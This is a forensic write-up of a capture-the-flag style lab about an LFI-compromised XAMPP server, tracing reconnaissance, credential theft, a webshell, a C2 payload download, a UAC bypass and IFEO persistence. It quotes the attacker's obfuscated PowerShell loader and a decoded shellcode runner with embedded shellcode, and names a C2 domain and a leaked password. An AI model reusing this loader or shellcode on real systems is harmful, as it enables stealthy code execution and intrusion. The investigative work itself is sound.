You can read this writeup on my GitBook account Link

Scenario

IT staff reported unusual behavior on a workstation running a web application, triggered by an antivirus detection of a suspicious file. Early indicators suggest the website may have served as the entry point.

Your task is to investigate the full scope of the compromise — tracing how the attacker gained access, what actions they performed, and how they established persistence on the system.

Reconnaissance

Q1: The threat actor began by probing the web application for hidden or accessible directories.
Which IP address was responsible for this scanning activity?

in the disk image we got xampp access logs, so we need to investigate it:

first, identify the ip address was responsible for this scanning activity, we’ve seen an ip address that made a lot of traffic, and tried to access some hidden directories:

218.84.168.131

Q2: When was the threat actor’s earliest recorded activity on the compromised website?

just extract the time were this ip address first seen in the wild, and don’t forget to set the time to the UTC, because the time is UTC +9:

2025-09-07 08:56

Q3: The threat actor rotated his User-Agent multiple times throughout the attack. How many User-Agents did the threat actor use during the first reconnaissance phase of the attack?

since he rotated the user agents, so i was able to see and count the unique user agents he did use:

13

Initial Access

Q4: A vulnerability was discovered in the old version of the website. How many files were read by the threat actor using the discovered vulnerability?

now we want to know how many files were read by the threat actor using a vulnerability! also the lab called LFI so i was ready to see LFI and i did actually. searching with ../ do see all possible file were read by the attacker:

1-  system.ini
2-  index.php
3-  db.php
4-  config.php

4

Credential Access

Q5: The threat actor was able to access the MySQL database using credentials from one of the files he accessed earlier. What is the password that the threat actor used to access the MySQL database?

if we read the question carefully we can see that he could access the db with credentials from one of the four files he accessed earlier, which is basically config.php file. since there isn’t any file in the xampp directory, so ofc it’s in the resident data. time to parse MFT correctly, so let’s go.

after parsing the MFT with MFTECmd.exe , getting the entry number of the file, multiplying 77932 by 1024 (NTFS MFT record size = 1024 bytes), then go to the hex address with HxD (ctrl+g)

77932 x 1024 = 79,802,368 --> (4C1B000)16

reversing the data from hex for better reading.

or using MFT Explorer and go to the direct file path C:\xampp\htdocs\config.php and read the file data directly:

IdonknowMayBe2222

Q6: When did the threat actor first successfully authenticate to the MySQL database?

filtering for the postrequests happened, so we got the best sequence
post request to theindex.php, then responded with redirection "302" , and accessed the website successfully with all files loaded "200"

2025-09-07 12:39

Exfiltration

Q7: After authenticating to the MySQL database, the threat actor targeted a specific database for exfiltration. Which database did he access?

filtered with "db" or "db=" to get the database clearly:

or from the config.php file that we got before from the MFT:

vtubermusic

Q8: Which table did the threat actor export from the database?

we can do double search here, searching for db=tubermusic , then search in the search output for table=

users

Execution

Q9: On the next day, the threat actor logged into the MySQL database again using a different IP address. What is this IP address?

the recent ip address logged in directly next day:

182.44.8.254

Q10: The threat actor used SQL commands to create a webshell.
What is the full path of this webshell file on the system?

we can search forcmd= or just scroll a little to find this

now we need to get the full path, we can predict it, but let’s get it correctly:

C:\xampp\htdocs\config_old.php

Q11: The threat actor used a Living-off-the-Land Binary (LOLBin) to hide the webshell. What MITRE ATT&CK technique corresponds to this activity?

T1564.001

Q12: The threat actor executed a command to download a reverse shell payload from a C2 server. What is the domain used to host this payload?

from the access.log file, we can view that powershell command ran

so let’s decode the url correctly

then decode the base64 encoded command

wscryss.xyz

Q13: The reverse shell payload was downloaded to a specific location and executed. What is the full path of this payload?

from the last decoded command we got in the last image above, we can get the answer directly since we know the username of the victim from the disk image "hoshisora" and the path found in the command can be from $env:TEMP\music.exe to C:\users\hoshisora\appdata\local\temp\music.exe .
we need to mention also that music.exe not found in the MFT, so if we need more clear evidence, we can view it clearly from the prefetch files :

or from the Amcache hive:

C:\users\hoshisora\appdata\local\temp\music.exe

Privilege Escalation

Q14: After establishing the C2 connection, the threat actor attempted several methods to bypass User Account Control (UAC).
One method used a PowerShell script. What is the name of this script?

investigating the powershell logs, searching for scripts extensions .ps1 :

LykIsnWn.ps1

Q15: The PowerShell script executed shellcode as part of its payload. What is the name of the variable that stores the raw shellcode in the script?

since it’s a powershell script, we can investigate the powershell operational log file as it records the actual powershell code that executed, including decoded and de-obfuscated script blocks with Event ID 4104, so with a quick filter on event id 4104, and LykIsnWn.ps1 we got one single event:

now, we’ve got a huge base64 encoded command, let’s decode it:

if([IntPtr]::Size -eq 4){$b='powershell.exe'}else{$b=$env:windir+
'\syswow64\WindowsPowerShell\v1.0\powershell.exe'};
$s=New-Object System.Diagnostics.ProcessStartInfo;$s.FileName=$b;
$s.Arguments='-noni -nop -w hidden -c &([scriptblock]::
create((New-Object System.IO.StreamReader
(New-Object System.IO.Compression.GzipStream
((New-Object System.IO.MemoryStream (,[System.Convert]::FromBase64String
(((''H4sIAMGAvmgCA7VWa4/aOhD9Xqn/''+''IaqQkqhZCA/1LitVuglsgJawsOGxQFHlTQy4m
BgSh4d6+9/vOI+F1bLV{0}is1EsKxZ8bjM8dnMo98lxPmS4dH6ef7d1L6dFGA1pKS2x5K1{0}1N
yu066mkx54YT6bOkTI{0}Nps''+''7WiPizm5taFATY58l7voG5EYZ4/UgJDhVV+kcaLXGAr+4
ef2CXSz+l{0}''+''Pd8g7JHRFOzYw25SyxdGb4n1trMRSKtvLOhhCvyt2+yOr0qzvK{0}2wjRU
JGdY8jxOu9RKqvSL1Vs2D9usCLbxA1YyOY8PyJ+uZQf+CGa4w5E22Eb8yXzQhnOcjpNgHkU+PGh
RJTERpFh2A2Ya{0}hegMNQ1qSpiD+dzf5Wpunm95HPyRrnWz7HAds4ONgRF4f5Jv''+''I9iu/x
fAZeDg+Iv5ipKpjt2AorOT+iVJP+Sxilg/cZdG91Us6dwKrLA1WDir48ps28iOLEUb6QZ0ICFZ6
ECIDeLwHgPKMO+nSBOqeJ7JnGKxjyVbosJLHrZ0nXJBu2RpwFR{0}jN9YMIq7MntKUc9{0}pb7a
{0}RipkrOJIFTEyHjHizk/uz0ucW1VDYvM7jOp4TH9ePPloTN6OqcqkeeE5xDEc+M+tAeoqcLmC
vjileIC4gFrR44X''+''a7JvzJ14wI9XBguFDTELKCcqvPk0mqpsgt{0}8Z''+''rwC55B57m5n
BBcGadXopjtrt4ByO5RlEYalI{0}ghvqapKDEcWeJhl+SNIlI+IsHsqndO2IcuKikGfhZupzNNN
da8wPeRC5UFRAoO9ss''+''EsQFYBoUpN42Dw6ZJHtLl+Eo4YohYsDkXZQD''+''pgRMDhcUCWA
RGNaqHkH89Z6Q/EabGLBsChagDyk1yPmFlpgT76''+''cZ{0}YLEsoLXDJAzrKEYjuUcU0akoCD
+giMxfz/SOGl6ohcagFOK''+''6Nkd2tqH''+''rmgfw65Zv1acDRFKMYj4ICFFbC1iUL8qZJIj
PKhcEe6''+''Bjzjlk9t78uKFFt7+NnwG9jzj22XLLpcZ2vbrYXdhnVtkP1i715{0}DNf74uGq
M6xw57bFa12j2SO6WVm6pt6H8aDFW40WH7eMZn/pUr17uzoUKqFO9s2RiJXE''+''cCuV5oNul
MuVu7K+AvTGpLhYGV5nTfaHNox''+''BS+/aZis09Ra9/VK7fxyVrMmINgsVazkfsdD5NK4XCo
Wqh+r20TBM5pXt40PxnvWb7tqs+KxQrVVWxq1h1PzboW''+''Wyr2MzMLqFIVps2P4rqdLGoma
YlkvwpDewzF7PMo1B48e2Xi0sCtXRA1qao2GJTDYP90t4t/bNnl{0}QKy0PH9h1e0SGOxHL{0}
JrW5AEZ7cnRKhSK47CEViYzTADWmmyNxnK8sboU/PuDEjOGtHOy7TXrX91J8a/Q/vwBKjkdEJ+
XS7McK/9oCql7/y5HymfFfE{0}EbRSES0Shy''+''CDP2VWz''+''WGClittlRHgoCjTtFQ58
TKHRQSvMGGpQylyh9qDM0GcS9RfNaNCKE7o0UqUnQ/XUBLKpm5sJZAicj/mYb2N/wZeafijrOg
i4ftArMbvffrAa2xyVJJomegAA8xSdxtEhIJlLivKnwYIuz0FzXoPrNeRg{0}xUoBChWcnEFfi
Zj9By9+FBPLHgGHWBWhGNPRXuP+QEBrvAWREX0v/N+mtt9r/5JzqTqs4Q/7/ecOc{0}''+''9Z
vVNPNI1Ac2LyecTZ5L9xw4/QoSDnQP6SXHS0S9hkF6Rs8pCUYD+8/QR
H7h{0}Eb/qwCdTrOD/AhBI1txXCwAA'')-f''3'')))),
[System.IO.Compression.CompressionMode]::Decompress))).ReadToEnd()))';
$s.UseShellExecute=$false;$s.RedirectStandardOutput=$true;
$s.WindowStyle='Hidden';$s.CreateNoWindow=$true;
$p=[System.Diagnostics.Process]::Start($s);

so what’s happening here is:

1-  Base64 decode the payload
2-  Decompress with GZip
3-  Read decoded text into memory
4-  Create a ScriptBlock
5-  Execute it in memory

By following this sequence in reverse, the payload can be decoded by:

1- Extract the encoded payload string
2- Remove string concatenation markers (''+'' → nothing)
3- Replace format placeholders ({0} → 3, as applied by -f '3')
4- Base64-decode the result
5- GZip-decompress the decoded bytes
6- Read the decompressed text
7- Recover the original PowerShell code
➡️ Encoded string → formatted → decoded → decompressed → readable script

so let’s extract the shellcode:

H4sIAMGAvmgCA7VWa4/aOhD9Xqn/''+''IaqQkqhZCA/1LitVuglsgJawsOGxQFHlTQy4m
BgSh4d6+9/vOI+F1bLV{0}is1EsKxZ8bjM8dnMo98lxPmS4dH6ef7d1L6dFGA1pKS2x5K1{0}1N
yu066mkx54YT6bOkTI{0}Nps''+''7WiPizm5taFATY58l7voG5EYZ4/UgJDhVV+kcaLXGAr+4
ef2CXSz+l{0}''+''Pd8g7JHRFOzYw25SyxdGb4n1trMRSKtvLOhhCvyt2+yOr0qzvK{0}2wjRU
JGdY8jxOu9RKqvSL1Vs2D9usCLbxA1YyOY8PyJ+uZQf+CGa4w5E22Eb8yXzQhnOcjpNgHkU+PGh
RJTERpFh2A2Ya{0}hegMNQ1qSpiD+dzf5Wpunm95HPyRrnWz7HAds4ONgRF4f5Jv''+''I9iu/x
fAZeDg+Iv5ipKpjt2AorOT+iVJP+Sxilg/cZdG91Us6dwKrLA1WDir48ps28iOLEUb6QZ0ICFZ6
ECIDeLwHgPKMO+nSBOqeJ7JnGKxjyVbosJLHrZ0nXJBu2RpwFR{0}jN9YMIq7MntKUc9{0}pb7a
{0}RipkrOJIFTEyHjHizk/uz0ucW1VDYvM7jOp4TH9ePPloTN6OqcqkeeE5xDEc+M+tAeoqcLmC
vjileIC4gFrR44X''+''a7JvzJ14wI9XBguFDTELKCcqvPk0mqpsgt{0}8Z''+''rwC55B57m5n
BBcGadXopjtrt4ByO5RlEYalI{0}ghvqapKDEcWeJhl+SNIlI+IsHsqndO2IcuKikGfhZupzNNN
da8wPeRC5UFRAoO9ss''+''EsQFYBoUpN42Dw6ZJHtLl+Eo4YohYsDkXZQD''+''pgRMDhcUCWA
RGNaqHkH89Z6Q/EabGLBsChagDyk1yPmFlpgT76''+''cZ{0}YLEsoLXDJAzrKEYjuUcU0akoCD
+giMxfz/SOGl6ohcagFOK''+''6Nkd2tqH''+''rmgfw65Zv1acDRFKMYj4ICFFbC1iUL8qZJIj
PKhcEe6''+''Bjzjlk9t78uKFFt7+NnwG9jzj22XLLpcZ2vbrYXdhnVtkP1i715{0}DNf74uGq
M6xw57bFa12j2SO6WVm6pt6H8aDFW40WH7eMZn/pUr17uzoUKqFO9s2RiJXE''+''cCuV5oNul
MuVu7K+AvTGpLhYGV5nTfaHNox''+''BS+/aZis09Ra9/VK7fxyVrMmINgsVazkfsdD5NK4XCo
Wqh+r20TBM5pXt40PxnvWb7tqs+KxQrVVWxq1h1PzboW''+''Wyr2MzMLqFIVps2P4rqdLGoma
YlkvwpDewzF7PMo1B48e2Xi0sCtXRA1qao2GJTDYP90t4t/bNnl{0}QKy0PH9h1e0SGOxHL{0}
JrW5AEZ7cnRKhSK47CEViYzTADWmmyNxnK8sboU/PuDEjOGtHOy7TXrX91J8a/Q/vwBKjkdEJ+
XS7McK/9oCql7/y5HymfFfE{0}EbRSES0Shy''+''CDP2VWz''+''WGClittlRHgoCjTtFQ58
TKHRQSvMGGpQylyh9qDM0GcS9RfNaNCKE7o0UqUnQ/XUBLKpm5sJZAicj/mYb2N/wZeafijrOg
i4ftArMbvffrAa2xyVJJomegAA8xSdxtEhIJlLivKnwYIuz0FzXoPrNeRg{0}xUoBChWcnEFfi
Zj9By9+FBPLHgGHWBWhGNPRXuP+QEBrvAWREX0v/N+mtt9r/5JzqTqs4Q/7/ecOc{0}''+''9Z
vVNPNI1Ac2LyecTZ5L9xw4/QoSDnQP6SXHS0S9hkF6Rs8pCUYD+8/QR
H7h{0}Eb/qwCdTrOD/AhBI1txXCwAA

with this amazing cyberchef recipe, we can decode all of it perfectly LINK:

so now, by reading the following decoded script, we can answer easily:

function xb {
Param ($qx28T, $vN)
$csZ = ([AppDomain]::CurrentDomain.GetAssemblies() |
Where-Object { $_.GlobalAssemblyCache -And $_.Location.Split('\\')
[-1].Equals('System.dll') }).GetType('Microsoft.Win32.UnsafeNativeMethods')
return $csZ.GetMethod('GetProcAddress',
[Type[]]@([System.Runtime.InteropServices.HandleRef], [String])).
Invoke($null, @([System.Runtime.InteropServices.HandleRef]
(New-Object System.Runtime.InteropServices.HandleRef((New-Object IntPtr),
($csZ.GetMethod('GetModuleHandle')).Invoke($null, @($qx28T)))), $vN)) }
function a6 {
Param (
[Parameter(Position = 0, Mandatory = $True)] [Type[]] $tdQq,
[Parameter(Position = 1)] [Type] $ig = [Void])
$g9s = [AppDomain]::CurrentDomain.DefineDynamicAssembly
((New-Object System.Reflection.AssemblyName('ReflectedDelegate')),
[System.Reflection.Emit.AssemblyBuilderAccess]::Run).
DefineDynamicModule('InMemoryModule', $false).
DefineType('MyDelegateType', 'Class, Public, Sealed, AnsiClass,
AutoClass', [System.MulticastDelegate])
$g9s.DefineConstructor('RTSpecialName,HideBySig,
Public', [System.Reflection.CallingConventions]::Standard, $tdQq).
SetImplementationFlags('Runtime, Managed') $g9s.DefineMethod('Invoke',
'Public, HideBySig, NewSlot, Virtual', $ig, $tdQq).
SetImplementationFlags('Runtime, Managed')
return $g9s.CreateType() }
[Byte[]]$acBD8 = [System.Convert]::FromBase64String("/OiPAAAAYInlMd
Jki1Iwi1IMi1IUMf+LcigPt0omMcCsPGF8Aiwgwc8NAcdJde9SV4tSEItCPAHQi0B4hcB
0TAHQUItIGItYIAHThcl0PEkx/4s0iwHWMcCswc8NAcc44HX0A334O30kdeBYi1gkAdNm
iwxLi1gcAdOLBIsB0IlEJCRbW2FZWlH/4FhfWosS6YD///
9daDMyAABod3MyX1RoTHcmB4no/9C4kAEAACnEVFBoKYBrAP/
VagpowKi9lGgCABFcieZQUFBQQFBAUGjqD9/g/9WXahBWV2iZpXRh/9WFwHQM
/04Idexo8LWiVv/VagBqBFZXaALZyF// 1Ys2akBoABAAAFZqAGhYpFPl/
9WTU2oAVlNXaALZyF//1QHDKcZ17sM=")
[Uint32]$o3jH = 0 $i3 = [System.Runtime.InteropServices.Marshal]::
GetDelegateForFunctionPointer((xb kernel32.dll VirtualAlloc),
(a6 @([IntPtr], [UInt32], [UInt32], [UInt32]) ([IntPtr]))).
Invoke([IntPtr]::Zero, $acBD8.Length,0x3000, 0x04)
[System.Runtime.InteropServices.Marshal]::
Copy($acBD8, 0, $i3, $acBD8.length)
if (([System.Runtime.InteropServices.Marshal]::
GetDelegateForFunctionPointer ((xb kernel32.dll VirtualProtect),
(a6 @([IntPtr], [UIntPtr], [UInt32], [UInt32].MakeByRefType())
([Bool]))).Invoke($i3, [Uint32]
$acBD8.Length,0x10,[Ref]$o3jH)) -eq $true) {
$v_9 = [System.Runtime.InteropServices.Marshal]::
GetDelegateForFunctionPointer((xb kernel32.dll CreateThread),
(a6 @([IntPtr] ,[UInt32], [IntPtr], [IntPtr], [UInt32], [IntPtr])
([IntPtr]))). Invoke([IntPtr]::Zero,0,
$i3,[IntPtr]::Zero,0,[IntPtr]::Zero)
[System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer
((xb kernel32.dll WaitForSingleObject), (a6 @([IntPtr], [Int32]))).
Invoke($v_9,0xffffffff) | Out-Null  }

acBD8

Q16: After failing to bypass UAC, the threat actor downloaded another binary to authenticate as the compromised user.
What is the original filename of this binary?

According to the question, the attacker downloaded and executed another binary for authentication. Therefore, by filtering Event ID 4624 (successful logon), we can review the associated logon events and identify the processes and files involved during the authentication activity.

filtered Event ID 4624 and focused on the user hoshisora <victim>

found a suspicious binary file, so we need deep investigation for this one:
r.exe file not found in MFT, so i did use NTFS log tracker with and $MFT $Logfile $J but it was nothing!! so only option we got is Amcache hive:

after parsing the Amcache with Amcacheparser.exe , we got the sha1 hash for the r.exe file, and using VirusTotal we can get the original filename:

RunasCs.exe

Q17: What is the SHA-256 hash of the reverse-shell payload the threat actor uploaded and used with the previously identified binary?

Soooo!! answering this question is kinda hard to solve directly without completing all questions, it’s related to Q19 & Q20 in Persistence section.
also, reading the challenge description might help, so anyways let’s dig more
by investigating the windows defender logs, we can view that there’s a file caught as a malware by the windows defender, and marked as a trojan/meterpreter reverse-shell

So we can get the hash from the MPLog-*.log file:

087e9494deb843bf6c1f9284697658cb06ac1ac537c1b738ec3bc80f24f32731

Persistence

Q18: Which MITRE ATT&CK technique did the threat actor use to establish persistence through registry modifications that execute a payload upon a program’s silent termination?

T1546.012

Q19: Which program was configured to monitor and execute the threat actor’s payload as part of his persistence mechanism?

The technique used to establish persistence by executing a payload when a process exits silently is: T1546.012

This is a sub-technique of Event Triggered Execution (T1546) specifically involving Image File Execution Options (IFEO) Injection via the SilentProcessExitmechanism.

The attacker typically modifies the registry key: HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SilentProcessExit\
so let’s investigate it :

Notepad

Q20: The persistence binary executed once on the compromised system. What was the process ID of this execution?

since we know the persistence binary “spoolsc.exe”, getting the process id is easily since we already investigated the windows defender log up and got the process ID there. but let’s get it with another way using chainsaw

8056

Thanks For Reading, Hope you enjoyed❤️